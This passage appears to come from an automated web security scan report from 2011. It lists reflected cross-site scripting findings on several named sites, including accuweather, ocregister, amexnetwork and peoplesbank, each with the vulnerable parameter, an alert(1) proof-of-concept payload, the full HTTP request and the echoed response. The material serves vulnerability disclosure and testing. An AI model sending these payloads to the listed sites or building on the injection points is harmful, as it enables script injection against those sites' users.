Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 16:19:31 GMT
Server: PWS/1.7.1.2
X-Px: ms jfk-agg-n11 ( jfk-agg-n8), ms jfk-agg-n8 ( origin>CONN)
Cache-Control: max-age=2760
Expires: Thu, 03 Feb 2011 17:05:31 GMT
Age: 0
Content-Type: text/javascript
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 3913


//v1.0
function AC_AddExtension(src, ext)
{
if (src.indexOf('?') != -1)
return src.replace(/\?/, ext+'?');
else
return src + ext;
}

function AC_Generateobj(objAttrs, params, e
...[SNIP]...
"] = mimeType;
return ret;
}


RunNetWeather ("id","netWxV2","minversion","8,0,0,0","movie","http://netwx.accuweather.com/netWx-V212?zipcode=10025&customtheme=&theme=clouds&metric=0&target=_self4df0b";alert(1)//aada13118d6&lang=eng&url=&video=&category=&logo=1&tStyle=normal&partner=netweather&myspace=0","src","http://netwx.accuweather.com/netWx-V212?zipcode=10025&customtheme=&theme=clouds&metric=0&target=_self4df0b";ale
...[SNIP]...

4.410. http://netweather.accuweather.com/adcbin/netweather_v2/netweatherV2ex.asp [theme parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://netweather.accuweather.com
Path:   /adcbin/netweather_v2/netweatherV2ex.asp

Issue detail

The value of the theme request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e337d"%3balert(1)//a1ece0aaeff was submitted in the theme parameter. This input was echoed as e337d";alert(1)//a1ece0aaeff in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adcbin/netweather_v2/netweatherV2ex.asp?partner=netweather&tStyle=normal&logo=1&zipcode=10025&lang=eng&size=12&theme=cloudse337d"%3balert(1)//a1ece0aaeff&metric=0&target=_self HTTP/1.1
Host: netweather.accuweather.com
Proxy-Connection: keep-alive
Referer: http://www.online6health.com/HEALTH/Acai-Berry/index.php
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 16:18:53 GMT
Server: PWS/1.7.1.2
X-Px: ms jfk-agg-n11 ( jfk-agg-n4), ms jfk-agg-n4 ( origin>CONN)
Cache-Control: max-age=3180
Expires: Thu, 03 Feb 2011 17:11:53 GMT
Age: 0
Content-Type: text/javascript
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 3913


//v1.0
function AC_AddExtension(src, ext)
{
if (src.indexOf('?') != -1)
return src.replace(/\?/, ext+'?');
else
return src + ext;
}

function AC_Generateobj(objAttrs, params, e
...[SNIP]...
) ret.embedAttrs["type"] = mimeType;
return ret;
}


RunNetWeather ("id","netWxV2","minversion","8,0,0,0","movie","http://netwx.accuweather.com/netWx-V212?zipcode=10025&customtheme=&theme=cloudse337d";alert(1)//a1ece0aaeff&metric=0&target=_self&lang=eng&url=&video=&category=&logo=1&tStyle=normal&partner=netweather&myspace=0","src","http://netwx.accuweather.com/netWx-V212?zipcode=10025&customtheme=&theme=cloudse337d";ale
...[SNIP]...

4.411. http://netweather.accuweather.com/adcbin/netweather_v2/netweatherV2ex.asp [zipcode parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://netweather.accuweather.com
Path:   /adcbin/netweather_v2/netweatherV2ex.asp

Issue detail

The value of the zipcode request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c8162"%3balert(1)//ba94b6bb5ca was submitted in the zipcode parameter. This input was echoed as c8162";alert(1)//ba94b6bb5ca in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adcbin/netweather_v2/netweatherV2ex.asp?partner=netweather&tStyle=normal&logo=1&zipcode=10025c8162"%3balert(1)//ba94b6bb5ca&lang=eng&size=12&theme=clouds&metric=0&target=_self HTTP/1.1
Host: netweather.accuweather.com
Proxy-Connection: keep-alive
Referer: http://www.online6health.com/HEALTH/Acai-Berry/index.php
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 16:17:32 GMT
Server: PWS/1.7.1.2
X-Px: ms jfk-agg-n11 ( jfk-agg-n34), ms jfk-agg-n34 ( origin>CONN)
Cache-Control: max-age=2820
Expires: Thu, 03 Feb 2011 17:04:32 GMT
Age: 0
Content-Type: text/javascript
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 3913


//v1.0
function AC_AddExtension(src, ext)
{
if (src.indexOf('?') != -1)
return src.replace(/\?/, ext+'?');
else
return src + ext;
}

function AC_Generateobj(objAttrs, params, e
...[SNIP]...
uginsPage;
if (mimeType) ret.embedAttrs["type"] = mimeType;
return ret;
}


RunNetWeather ("id","netWxV2","minversion","8,0,0,0","movie","http://netwx.accuweather.com/netWx-V212?zipcode=10025c8162";alert(1)//ba94b6bb5ca&customtheme=&theme=clouds&metric=0&target=_self&lang=eng&url=&video=&category=&logo=1&tStyle=normal&partner=netweather&myspace=0","src","http://netwx.accuweather.com/netWx-V212?zipcode=10025c8162";ale
...[SNIP]...

4.412. http://ocresort.ocregister.com/2011/02/03/disney-parks-renovate-9-attractions-other-areas/68810/ [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ocresort.ocregister.com
Path:   /2011/02/03/disney-parks-renovate-9-attractions-other-areas/68810/

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b5ef3"><script>alert(1)</script>3b1abce3997 was submitted in the REST URL parameter 5. This input was echoed as b5ef3\"><script>alert(1)</script>3b1abce3997 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2011/02/03/disney-parks-renovate-9-attractions-other-areas/68810b5ef3"><script>alert(1)</script>3b1abce3997/ HTTP/1.1
Host: ocresort.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:15:25 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://ocresort.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:15:25 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 56355

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
alternate" type="application/rss+xml" title=" Page not found - Around Disney - www.ocregister.com" href="http://ocresort.ocregister.com/2011/02/03/disney-parks-renovate-9-attractions-other-areas/68810b5ef3\"><script>alert(1)</script>3b1abce3997/feed/" />
...[SNIP]...

4.413. http://ocresort.ocregister.com/2011/02/03/disney-parks-renovate-9-attractions-other-areas/68810/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ocresort.ocregister.com
Path:   /2011/02/03/disney-parks-renovate-9-attractions-other-areas/68810/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8f4a3"><script>alert(1)</script>ebc82fd6548 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8f4a3\"><script>alert(1)</script>ebc82fd6548 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2011/02/03/disney-parks-renovate-9-attractions-other-areas/68810/?8f4a3"><script>alert(1)</script>ebc82fd6548=1 HTTP/1.1
Host: ocresort.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:15:05 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://ocresort.ocregister.com/xmlrpc.php
Link: <http://ocresort.ocregister.com/?p=68810>; rel=shortlink
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 78618


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http:
...[SNIP]...
" title=" Disney parks renovate 9 attractions, other areas - Around Disney - www.ocregister.com" href="http://ocresort.ocregister.com/2011/02/03/disney-parks-renovate-9-attractions-other-areas/68810/?8f4a3\"><script>alert(1)</script>ebc82fd6548=1feed/" />
...[SNIP]...

4.414. http://offers.amexnetwork.com/portalext/inline/back_support_mock_ie.jsp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://offers.amexnetwork.com
Path:   /portalext/inline/back_support_mock_ie.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 457ed'-alert(1)-'43bbf2ba26d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /portalext/inline/back_support_mock_ie.jsp?457ed'-alert(1)-'43bbf2ba26d=1 HTTP/1.1
Host: offers.amexnetwork.com
Proxy-Connection: keep-alive
Referer: http://offers.amexnetwork.com/selects/us/grid?categoryPath=/amexnetwork/category/Shoppinga21a4%22%3E%3Cscript%3Ealert(1)%3C/script%3E9146dd0abe&issuerName=us_prop&inav=menu_rewards_shopping
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Surrogate-Control: no-store
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: Accept-Encoding
Cache-Control: no-cache
Expires: Thu, 03 Feb 2011 15:39:08 GMT
Date: Thu, 03 Feb 2011 15:39:08 GMT
Connection: close
Content-Length: 125

<script>
function getLocation() {
return '457ed'-alert(1)-'43bbf2ba26d=1';
}

parent.reloadHashSemaphore=false;
</script>

4.415. http://offers.amexnetwork.com/selects/us/grid [categoryPath parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://offers.amexnetwork.com
Path:   /selects/us/grid

Issue detail

The value of the categoryPath request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a21a4"><script>alert(1)</script>9146dd0abe was submitted in the categoryPath parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /selects/us/grid?categoryPath=/amexnetwork/category/Shoppinga21a4"><script>alert(1)</script>9146dd0abe&issuerName=us_prop&inav=menu_rewards_shopping HTTP/1.1
Host: offers.amexnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Cache-Control: no-cache
Expires: Thu, 03 Feb 2011 14:22:55 GMT
Date: Thu, 03 Feb 2011 14:22:55 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 215250


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
   
   
                   
...[SNIP]...
10='';s.eVar10='';s.prop20='';s.eVar20='';
                                       switchSubCategory(this);

switchGrid('/PCOfferGridController/searchOffers.do?localLocale=en-us&categoryPath_last=/amexnetwork/category/Shoppinga21a4"><script>alert(1)</script>9146dd0abe&localCountryId=ccfb43b68d898110VgnVCM2000007cc6410aRCRD&pocsort=2&countryId=ccfb43b68d898110VgnVCM2000007cc6410aRCRD&issuerName=us_prop&categoryPath=/amexnetwork/category/Travel/Air');

return switc
...[SNIP]...

4.416. http://offers.amexnetwork.com/selects/us/grid [issuerName parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://offers.amexnetwork.com
Path:   /selects/us/grid

Issue detail

The value of the issuerName request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 13a13"><script>alert(1)</script>8d46a60ecb1 was submitted in the issuerName parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /selects/us/grid?categoryPath=/amexnetwork/category/Shopping&issuerName=us_prop13a13"><script>alert(1)</script>8d46a60ecb1&inav=menu_rewards_shopping HTTP/1.1
Host: offers.amexnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Cache-Control: no-cache
Expires: Thu, 03 Feb 2011 14:27:34 GMT
Date: Thu, 03 Feb 2011 14:27:34 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 291329


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
   
   
                   
...[SNIP]...
<a href="/selects/us?issuerName=us_prop13a13"><script>alert(1)</script>8d46a60ecb1">
...[SNIP]...

4.417. http://offers.amexnetwork.com/selects/us/grid [issuerName parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://offers.amexnetwork.com
Path:   /selects/us/grid

Issue detail

The value of the issuerName request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 82cc0"%3balert(1)//5ac35aa2ed1 was submitted in the issuerName parameter. This input was echoed as 82cc0";alert(1)//5ac35aa2ed1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /selects/us/grid?categoryPath=/amexnetwork/category/Shopping&issuerName=us_prop82cc0"%3balert(1)//5ac35aa2ed1&inav=menu_rewards_shopping HTTP/1.1
Host: offers.amexnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Cache-Control: no-cache
Expires: Thu, 03 Feb 2011 14:28:36 GMT
Date: Thu, 03 Feb 2011 14:28:36 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 287293


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
   
   
                   
...[SNIP]...
.do?localLocale=en-us&categoryPath=/amexnetwork/category/Shopping&localCountryId=ccfb43b68d898110VgnVCM2000007cc6410aRCRD&pocsort=2&countryId=ccfb43b68d898110VgnVCM2000007cc6410aRCRD&issuerName=us_prop82cc0";alert(1)//5ac35aa2ed1&popup=true&offerId=<offerId>
...[SNIP]...

4.418. http://offers.amexnetwork.com/selects/us/grid [issuerName parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://offers.amexnetwork.com
Path:   /selects/us/grid

Issue detail

The value of the issuerName request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bae6e'%3balert(1)//ad3a1fe5923 was submitted in the issuerName parameter. This input was echoed as bae6e';alert(1)//ad3a1fe5923 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /selects/us/grid?categoryPath=/amexnetwork/category/Shopping&issuerName=us_propbae6e'%3balert(1)//ad3a1fe5923&inav=menu_rewards_shopping HTTP/1.1
Host: offers.amexnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Cache-Control: no-cache
Expires: Thu, 03 Feb 2011 14:29:41 GMT
Date: Thu, 03 Feb 2011 14:29:41 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 287293


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
   
   
                   
...[SNIP]...
.do?localLocale=en-us&categoryPath=/amexnetwork/category/Shopping&localCountryId=ccfb43b68d898110VgnVCM2000007cc6410aRCRD&pocsort=2&countryId=ccfb43b68d898110VgnVCM2000007cc6410aRCRD&issuerName=us_propbae6e';alert(1)//ad3a1fe5923',
    {
               method:'GET',
               onComplete:parseXml
           });
}
function parseXml(response)
{
var responseXml = response.responseXML;
//alert(responseXml);
var m
...[SNIP]...

4.419. http://onlinecheckingsbanking.com/ [adid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://onlinecheckingsbanking.com
Path:   /

Issue detail

The value of the adid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3b4a7"><script>alert(1)</script>c726bd08fb8 was submitted in the adid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?keyword=online%20banking&adid=3b4a7"><script>alert(1)</script>c726bd08fb8 HTTP/1.1
Host: onlinecheckingsbanking.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 13:43:46 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.9
X-Powered-By: PHP/5.2.9
Set-Cookie: PHPSESSID=947b717b071dadc68ba7dd3e56fcdf06; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 721
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Content-
...[SNIP]...
<frame src="http://getcheckingaccountonline.com/?keyword=online%20banking&adid=3b4a7"><script>alert(1)</script>c726bd08fb8" "frameborder=0"/>
...[SNIP]...

4.420. http://onlinecheckingsbanking.com/ [keyword parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://onlinecheckingsbanking.com
Path:   /

Issue detail

The value of the keyword request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b8916"><script>alert(1)</script>2d8d0fb1f0b was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?keyword=b8916"><script>alert(1)</script>2d8d0fb1f0b&adid=289819058 HTTP/1.1
Host: onlinecheckingsbanking.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 13:43:45 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.9
X-Powered-By: PHP/5.2.9
Set-Cookie: PHPSESSID=d460c720f7cd5ee81d00c4a5c9da894f; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 714
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Content-
...[SNIP]...
<frame src="http://getcheckingaccountonline.com/?keyword=b8916"><script>alert(1)</script>2d8d0fb1f0b&adid=289819058" "frameborder=0"/>
...[SNIP]...

4.421. http://onlinecheckingsbanking.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://onlinecheckingsbanking.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b820e"><script>alert(1)</script>6f57152ba82 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?keyword=online%20banking&adid=289819058&b820e"><script>alert(1)</script>6f57152ba82=1 HTTP/1.1
Host: onlinecheckingsbanking.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 13:43:47 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.9
X-Powered-By: PHP/5.2.9
Set-Cookie: PHPSESSID=cf6aa261be55b78f06bd6404dc8b066c; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 733
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Content-
...[SNIP]...
<frame src="http://getcheckingaccountonline.com/?keyword=online%20banking&adid=289819058&b820e"><script>alert(1)</script>6f57152ba82=1" "frameborder=0"/>
...[SNIP]...

4.422. http://peoplesbank.com/search.php [term parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://peoplesbank.com
Path:   /search.php

Issue detail

The value of the term request parameter is copied into the HTML document as plain text between tags. The payload 9183b<script>alert(1)</script>6fd4fa2c65b was submitted in the term parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /search.php?d=peoplesbank.com&cachekey=1296747318&rc=true&term=Internet+banking9183b<script>alert(1)</script>6fd4fa2c65b&append= HTTP/1.1
Host: peoplesbank.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: sid=n94u5lhrbr0a5c7as50gdp2tc0;

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
P3P: CP="NOI COR NID ADMa DEVa PSAa PSDa STP NAV DEM STA PRE"
Cache-Control: no-cache
Content-type: text/html
Connection: close
Date: Thu, 03 Feb 2011 15:41:42 GMT
Server: lighttpd
Content-Length: 18861

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="au
...[SNIP]...
<span class="searchedfor">INTERNET BANKING9183B<SCRIPT>ALERT(1)</SCRIPT>6FD4FA2C65B</span>
...[SNIP]...

4.423. http://pixel.invitemedia.com/admeld_sync [admeld_callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.invitemedia.com
Path:   /admeld_sync

Issue detail

The value of the admeld_callback request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 346ad'%3balert(1)//f0a82ea655a was submitted in the admeld_callback parameter. This input was echoed as 346ad';alert(1)//f0a82ea655a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /admeld_sync?admeld_user_id=6acccca4-d0e4-464e-a824-f67cb28d5556&admeld_adprovider_id=300&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match346ad'%3balert(1)//f0a82ea655a HTTP/1.1
Host: pixel.invitemedia.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/80/accuweather/728x90/accuweather_atf?t=1296754761812&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.accuweather.com%2Fmaps-satellite.asp&refer=http%3A%2F%2Fburp%2Fshow%2F64
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=82d726c3-44ee-407c-85c4-39a0b0fc11ef; exchange_uid=eyIyIjogWyI0NzYwNDkyOTk5MjEzODAxNzMzIiwgNzM0MTcwXSwgIjQiOiBbIkNBRVNFSk81T0hYNWxOR0lITDdmRUVFSjQtWSIsIDczNDE1MV19; io_frequency="{\"8866\": [0+ 0+ 1296072684+ 1+ 1296072684+ 1]+ \"8171\": [0+ 0+ 1296660699+ 2+ 1296659838+ 2]+ \"8733\": [0+ 0+ 1295634039+ 1+ 1295634039+ 1]+ \"9376\": [0+ 0+ 1296659628+ 1+ 1296659628+ 1]}"; impressions="{\"429622\": [1295634039+ \"94ea05fe-2d4a-3bf7-a98e-3964b49408cd\"+ 83803+ 56236+ 46]+ \"417817\": [1296072684+ \"5b6de59f-cbbc-3ba4-8c51-0a4d6d7a0ec7\"+ 8863+ 40494+ 9173]+ \"351309\": [1296660699+ \"6b326db0-ad1f-378f-98c3-837da14b6503\"+ 139089+ 81343+ 191]+ \"456235\": [1296659628+ \"85680993-10ca-3909-9c72-ac737305e927\"+ 139089+ 81343+ 191]}"; frequency="{\"429622\": [1295893239+ 1+ 1295634039+ 1+ 1295634039+ 1]+ \"417817\": [1297368684+ 1+ 1296072684+ 1+ 1296072684+ 1]+ \"351309\": [1296660759+ 1+ 1296660699+ 2+ 1296659838+ 2]+ \"456235\": [1296659688+ 1+ 1296659628+ 1+ 1296659628+ 1]}"; subID="{}"; dp_rec="{\"1\": 1296659838+ \"3\": 1296659629+ \"2\": 1296508071+ \"4\": 1296660699}"; 